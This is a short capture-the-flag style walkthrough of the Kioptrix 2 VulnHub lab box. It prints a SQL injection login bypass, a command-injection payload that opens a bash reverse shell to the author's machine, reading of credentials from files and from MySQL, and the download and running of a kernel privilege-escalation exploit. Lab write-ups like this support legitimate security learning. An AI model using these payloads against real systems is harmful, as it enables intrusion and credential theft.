Kioptrix 2 VulnHub Walkthrough
I started this box with a netdiscover scan It found that it was ip 192.168.0.131
netdiscover -r 192.168.0.0/24
Discovered some open ports
Apache webserver with version and OS info
Some info over https
Looks like this sites running php
We also have a cups server
And a mysql server that our IP isn’t permitted to connect to:
OS and kernel info
First thing I attempted to enum was the webserver. I browsed to 192.168.0.130 to find a login page.
tried to most basic ” ‘ or 1=1– ” for both username and password, and it logined me in successfully!
The prompt asked for a machine to ping, so let’s give it a try:
I tried to inject some code in the text box by trying a couple different syntax commands from various languages.
It seems like the box is running a bash script. Since “;” allowed for additional commands to be included in the user input variable, let see if we can get a reverse shell.
I issued a bash command to connect back to my machine 🙂
;bash -i >& /dev/tcp/192.168.0.129/1234 0>&1
After checking my present dir and looking at some of the files, I found a username and password in the index.php file
I also issed a cat /etc/passwd and found the user john on the sytem
I tried the mysql db first and was able to login
I looked through the databases and found a couple username and passwords
The admin password logged me into the web app just like the SQLi, but the john user just presented me with a blank screen. I tried these passwords in combination with john/admin/root over ssh, but no luck
I decided I needed some help, so I wanted to download linux exploit suggestor. I issued a command to find world writeable directories
/var/tmp looks like a good choice. I cd’d to that dir and downloaded LES.pl
It found a number of potential vulnerabilities
I tried a half_nelson exploit with no success, but on a second try, was successful with the sock_sendpage vuln. I downloaded the vuln to my kali machine, then issued a wget from the vuln vm
I chmod’d the file and ran it, now we have root!